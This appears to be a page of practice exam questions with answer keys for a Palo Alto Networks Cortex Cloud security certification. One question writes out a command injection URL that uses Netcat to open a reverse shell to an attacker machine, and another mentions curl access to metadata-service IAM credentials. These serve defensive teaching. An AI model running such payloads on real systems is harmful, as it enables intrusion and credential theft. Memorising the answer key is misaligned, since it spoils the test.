Palo Alto Networks Cloud Security Professional v1.0

Page: 1 / 4
Exam contains 60 questions

What is the automated method for Cortex Cloud to organize both a report by cloud type and a compliance benchmark that contains critical compliance issues to track over a 30-day threshold?

  • A. Use the cloud security report for tracking issues.
  • B. Create an account group with policy rules.
  • C. Use cloud compliance endpoint tracking policy rules.
  • D. Generate an assessment report tracking criticals.


Answer : D

How can a user determine the number of applications affected by a specific vulnerability and whether or not an endpoint agent is installed?

  • A. By viewing the Top Risky Vulnerabilities widget and filtering for the CVE
  • B. Browsing to the host inventory and viewing the vulnerabilities under Host Insights
  • C. By creating an asset group and a Cloud Security Assessment report
  • D. By creating an endpoint group and saving it as an agent management report


Answer : B

Which action can cloud workload protection (CWP) prevent?

  • A. Unauthorized users logging into a cloud service provider (CSP) account
  • B. Taking a snapshot of a running Linux virtual machine (VM)
  • C. Creation of a new Linux virtual machine (VM) without predefined tags
  • D. Malware execution on a Linux virtual machine (VM)


Answer : D

A developer writes a serverless application to extract a field from a file in an S3 bucket. The Lambda function is assigned the S3FullAccess managed policy.

Refer to the scenario to answer this question:
The serverless function does not sanitize its inputs, and code is injected into it. This results in malware being downloaded by a backend API server which is supposed to receive the API key from the function.
Which two capabilities could the API server use to detect the malware? (Choose two.)

  • A. Cloud Security Posture Management (CSPM)
  • B. Attack surface
  • C. Cloud Detection and Response (CDR)
  • D. Agentless disk scanning


Answer : BC

What is a lightweight solution that provides runtime visibility into an OpenShift cluster?

  • A. Cortex XDR for Cloud
  • B. Data broker
  • C. Agentless disk scanning
  • D. Kubernetes Connector


Answer : D

Based on the image below, what are the potential attack tactics and techniques involved and indicators of compromise (IoCs) that suggest a privilege escalation attempt?

  • A. Tactics and techniques: collection, command-and-control (C2), and impact
    IoCs: collecting system artifacts using cat, and establishing a C2 channel using curl to access metadata service for identity and access management (IAM) credentials
  • B. Tactics and techniques: initial access, exfiltration, and lateral movement
    IoCs: logging keystrokes using bash scripts, exfiltrating data with curl, and moving laterally using sudo
  • C. Tactics and techniques: defense evasion, persistence, and execution
    IoCs: hiding malicious processes using bash scripts, creating persistence through cron jobs, and executing commands using curl
  • D. Tactics and techniques: privilege escalation, credential access, and discovery
    IoCs: using curl to access metadata service for identity and access management (IAM) credentials


Answer : D

A user notices new Amazon EKS cluster endpoints connected to the Cortex Cloud console and wants to review the Cortex XDR agent YAML file used during deployment.
Where will the user find the file?

  • A. Data Sources
  • B. Host Inventory
  • C. Installations
  • D. Host Firewalls


Answer : C

In which two instances is it appropriate to implement the Kubernetes Connector instead of the XDR Cloud agent? (Choose two.)

  • A. When advanced mapping of artifacts and admission control are required
  • B. When runtime prevention and blocking are critical to the environment
  • C. When resource constraints on the underlying machine are a concern
  • D. When advanced network telemetry and traffic ingestion are a concern


Answer : AC

A company intends to deploy an Amazon EKS cluster to migrate its current application to a containerized design pattern. The application resides on dedicated servers and is always online, and any amount of downtime will be costly. There is currently no security visibility into either environment.
Which strategy should be implemented to achieve the company’s goal?

  • A. Deploy Kubernetes Connectors on the current environment and the new environment for the transition.
  • B. Install the Cortex XDR pro agent on the current environment and schedule downtime to configure the agent for the new environment.
  • C. Install the Cortex XDR agent for cloud on the current environment, and schedule downtime to configure the agent for the new environment.
  • D. Ensure agentless scanning and visibility is scoped for both environments and maintained during the transition.


Answer : D

An Ubuntu web server running Apache and PHP is compromised with the following command injection payload using Netcat to establish a direct connection back to the attacker machine: http://192.168.45.190/vuln.php?cmd=nc -e /bin/bash 192.168.45.161 4444
Which endpoint protection module would have prevented a successful connection had the Cloud Detection and Response (CDR) agent been installed on the server?

  • A. Network packet inspection engine
  • B. Restricted execution – network location
  • C. Shellcode protection
  • D. Reverse shell protection


Answer : D

A DevSecOps team requires CVE visibility into developer code repositories, while the cloud security team requires CVE visibility into developer applications at runtime.
Which Cortex Cloud capability is unique to the cloud security team’s requirement?

  • A. Static application security testing (SAST)
  • B. Vulnerability management
  • C. Code to Cloud
  • D. Software composition analysis (SCA)


Answer : C

A developer writes a serverless application to extract a field from a file in an S3 bucket. The Lambda function is assigned the S3FullAccess managed policy.

Refer to the scenario to answer this question:
Which capability of Cortex Cloud will detect the API key?

  • A. Agentless disk scanning secrets detection
  • B. Application security secrets detection
  • C. CI/CD posture management
  • D. Data Security Posture Management (DSPM)


Answer : B

A developer writes a serverless application to extract a field from a file in an S3 bucket. The Lambda function is assigned the S3FullAccess managed policy.

Refer to the scenario to answer this question:
Assuming that a fix is available for the vulnerable requests library declared in the requirements.txt file, how would a user remediate this vulnerability from Cortex Cloud?

  • A. Click on the vulnerability issue, then the Actions tab, then issue a pull request.
  • B. Click “Accept suggested changes” under the code shown in Known Usage.
  • C. Click into the serverless function inventory, open the asset, then create a pull request.
  • D. Click on the vulnerability issue, then the Actions tab, then issue a push request.


Answer : A

A company wants to centralize security findings from third-party security tools to prioritize remediation efforts.
Which two Application Security Posture Management (ASPM) features will achieve this integration and prioritization? (Choose two.)

  • A. Data encryption
  • B. Data Security Posture Management (DSPM)
  • C. Third-party ingestion
  • D. Contextual risk prioritization


Answer : CD

How does Cortex Cloud identify the risk of malicious code injection into a build pipeline?

  • A. By generating an alert showing which CI/CD pipeline is misconfigured and vulnerable to a poisoned pipeline execution (PPE)
  • B. By generating an alert on git committers demonstrating unusual activity patterns in the version control system (VCS)
  • C. By automatically detecting the issue and running a playbook through integrations with security orchestration, automation, and response (SOAR) tooling
  • D. By providing a real-time agent in the pipeline to block any activity outside an access list


Answer : A
